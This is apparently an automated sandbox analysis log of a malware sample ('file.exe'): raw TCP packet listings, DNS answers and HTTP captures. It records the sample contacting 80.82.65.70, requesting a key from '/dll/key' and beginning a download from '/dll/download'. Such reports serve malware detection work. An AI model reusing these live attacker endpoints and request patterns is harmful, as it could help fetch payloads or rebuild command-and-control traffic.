                                              Dec 13, 2024 10:49:17.618482113 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.619172096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.619344950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.619363070 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.619462013 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.620135069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.620191097 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.620292902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.620373011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.620987892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.621110916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.621123075 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.621258974 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.622812033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.622827053 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.622850895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.622873068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.622924089 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.623357058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.623694897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.623797894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.623811007 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.623852968 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.624815941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.624829054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.624876022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.625066042 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.625669003 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.625690937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.625749111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.626559019 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.626677990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.626766920 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.626844883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.627552032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.627665997 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.627722979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.628173113 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.711271048 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.711289883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.711378098 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.711528063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.711544037 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.711792946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.712425947 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.712443113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.712464094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.712508917 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.713152885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.713310957 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.713577032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.713674068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.714207888 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.714274883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.714293957 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.714386940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.715142012 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.715156078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.715396881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.716048956 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.716147900 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.716226101 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.716365099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.716989994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.717005014 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.717153072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.717827082 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.717905045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.718096018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.718825102 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.718839884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.718880892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.719260931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.719702959 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.719722033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.719789982 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.719789982 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.720602036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.720690966 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.720776081 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.720954895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.721493959 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.721616030 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.721641064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.721692085 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.722419024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.722516060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.722733021 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.723356962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.723412037 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.723787069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.723881006 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.724227905 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.724317074 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.724349976 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.724375010 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.725202084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.725219011 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.725322962 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.726103067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.726370096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.726409912 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.726485014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.727072001 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.727088928 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.727202892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.727967978 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.728081942 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.728111982 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.728193998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.728872061 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.728992939 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.729017973 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.729222059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.729784966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.729835033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.729836941 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.730108976 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.730704069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.730890989 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.730916023 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.731025934 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.731631994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.731724977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.731755018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.731802940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.793548107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.793570995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.793629885 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.793800116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.793858051 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.793962002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.793987036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.794621944 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.794814110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.794831991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.794903994 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.795644045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.795715094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.796058893 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.796077013 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.796158075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.796878099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.796956062 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.797327995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.797421932 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.797825098 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.797888994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.797911882 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.798723936 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.798751116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.798829079 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.798847914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.798891068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.799700022 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.799765110 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.799798965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.799885035 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.800729036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.800753117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.800921917 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.801568031 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.801582098 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.801630974 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.802651882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.802670956 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.802748919 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.803544044 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.803560972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.803616047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.804476976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.804492950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.804517031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.804604053 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.805326939 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.805331945 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.805368900 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.806186914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.806201935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.806252003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.807056904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.807140112 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.807162046 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.807266951 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.808047056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.808065891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.808088064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.808396101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.808967113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.808984995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.809030056 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.809030056 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.809822083 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.809936047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.810039043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.810697079 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.810822964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.810861111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.811642885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.811702967 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.811737061 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.811810970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.812664032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.812679052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.812736034 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.812736034 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.813627958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.813716888 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.813803911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.814580917 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.814595938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.814676046 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.814676046 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.815355062 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.816195011 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.816350937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.816365004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.816375971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.817326069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.817339897 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.817348957 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.817801952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.818142891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.818197012 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.819072962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.819092989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.819163084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.820038080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.820060015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.820126057 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.820491076 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.903510094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.903750896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.903790951 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.903831005 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.904025078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.904036999 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.904308081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.904721975 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.904839039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.904877901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.904994011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.905729055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.905735970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.906176090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.906563044 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.906822920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.906883001 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.907026052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.907497883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.907505989 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.907550097 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.907701015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.908425093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.908432961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.908623934 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.909368038 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.909429073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.909466982 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.909634113 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.910278082 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.910360098 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.910433054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.910835028 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.911341906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.911349058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.911744118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.912209034 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.912218094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.912419081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.913152933 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.913160086 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.913281918 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.913901091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.914141893 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.914321899 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.914845943 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.915010929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.915029049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.915159941 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.915827990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.915843010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.915884972 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.916016102 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.916714907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.916795969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.916848898 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.916949987 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.917642117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.917787075 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.917789936 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.918200970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.918618917 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.918627024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.918772936 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.919538021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.919544935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.919642925 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.919642925 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.920408010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.920416117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.920594931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.921571970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.921649933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:20.956320047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:20.956466913 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:25.981350899 CET4985880192.168.2.680.82.65.70

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 13, 2024 10:48:11.256686926 CET1.1.1.1192.168.2.60x78d0No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Dec 13, 2024 10:48:11.256686926 CET1.1.1.1192.168.2.60x78d0No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                              Dec 13, 2024 10:49:16.220664978 CET1.1.1.1192.168.2.60xc04fNo error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                              Dec 13, 2024 10:49:16.220664978 CET1.1.1.1192.168.2.60xc04fNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                              Dec 13, 2024 10:49:16.220664978 CET1.1.1.1192.168.2.60xc04fNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                              Dec 13, 2024 10:49:21.219228983 CET1.1.1.1192.168.2.60x9c1aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Dec 13, 2024 10:49:21.219228983 CET1.1.1.1192.168.2.60x9c1aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • 80.82.65.70

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.64976180.82.65.70807480C:\Users\user\Desktop\file.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 13, 2024 10:48:40.287070036 CET412OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: 1
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:41.645437956 CET204INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:41 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 1
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 30
                                              Data Ascii: 0
                                              Dec 13, 2024 10:48:41.700670004 CET386OUTGET /dll/key HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: 1
                                              Host: 80.82.65.70
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:48:42.177689075 CET224INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:48:41 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Length: 21
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                              Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                              Dec 13, 2024 10:48:42.185626030 CET391OUTGET /dll/download HTTP/1.1
                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                              User-Agent: 1
